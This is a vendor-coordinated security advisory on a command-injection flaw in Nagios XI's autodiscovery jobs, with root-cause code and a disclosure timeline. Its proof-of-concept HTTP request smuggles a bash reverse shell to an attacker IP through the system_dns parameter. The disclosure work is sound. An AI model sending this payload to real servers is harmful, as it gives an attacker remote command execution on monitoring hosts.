Nagios XI 5.5.10 Autodiscovery Authenticated Remote Code Execution
Summary
Command injection in Nagios XI before 5.5.11 allows authenticated users to execute arbitrary remote commands via a new autodiscovery job.
Product Description (from vendor)
“[Nagios XI] Provides monitoring of all mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure. Hundreds of third-party addons provide for monitoring of virtually all in-house applications, services, and systems”. For more information visit https://www.nagios.com/products/nagios-xi/.
CVE(s)
Details
Root Cause Analysis
Autodiscovery jobs allow a user to setup a scheduled scan of a specific subnet, along with many other options. That functionality resides in nagiosxi/basedir/html/includes/components/autodiscovery/autodiscovery.inc.php, where the function called autodiscovery_component_get_cmdline handles the user-provided parameters and returns the shell commands to run:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| <?php
function autodiscovery_component_get_cmdline($jobid){
[...]
--> $system_dns = grab_array_var($jarr, "system_dns", "off");
[...]
if ($system_dns == "on") {
$system_dns = "--system-dns=1";
}
[...]
--> $cmd = "rm -f " . $xml_file . "; touch " . $watch_file . "; sudo /usr/bin/php " . $script_dir . "autodiscover_new.php --addresses=\"" . escapeshellcmd($address) . "\" --exclude=\"" . escapeshellcmd($exclude_address) . "\" --output=" . $xml_file . " --watch=" . $watch_file . " --onlynew=0 --debug=1 " . $osd . " " . $topod . " " . $scan_delay . " " . $system_dns . " > " . $out_file . " 2>&1 & echo $!";
return $cmd;
}
|
Since it is not validated nor sanitized, by providing the API endpoint a malicious system_dns HTTP POST parameter it is possible to gain arbitrary code execution on the Nagios XI host.
Proof of Concept
- Edit the following HTTP request with the correct cookie and reverse shell parameters and send it:
1
2
3
4
5
6
7
8
| POST /nagiosxi/includes/components/autodiscovery/?mode=newjob HTTP/1.1
Host: nagiosxi.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 310
Connection: close
Cookie: nagiosxi=8rspko6npt4lkfqcvo9u5i70b2
update=1&job=-1&nsp=d333dca41f296fae9327eecdce86332176ed6bfc82c352e3276751ecedd6f172&address=192.168.1&exclude_address=&frequency=Once&hour=09&minute=00&m=AM&dayofweek=1&dayofmonth=1&os_detection=on&scandelay=&system_dns=%3bbash+-i+>%26+/dev/tcp/192.168.13.37/31337+0>%261%3b&topology_detection=&updateButton=
|
- Notice a TCP reverse shell is spawned with Nagios XI privileges.
Impact
An authenticated attacker with autodiscovery job creation privileges can gain remote code execution on the Nagios XI host.
Upgrade to Nagios XI 5.5.11 or later. (Note: we didn’t verify the patch.)
Disclosure Timeline
This report was subject to Shielder’s disclosure policy:
- 20/02/2019:
- Vulnerability report is sent to vendor
- Vendor acknowledges issue and begins triage process
- 28/02/2019: Vendor releases Nagios XI 5.5.11
- 10/04/2019: Shielder’s advisory is made public
Credits
`polict` of Shielder
This advisory was first published on https://www.shielder.com/it/advisories/nagiosxi-autodiscovery-auth-rce/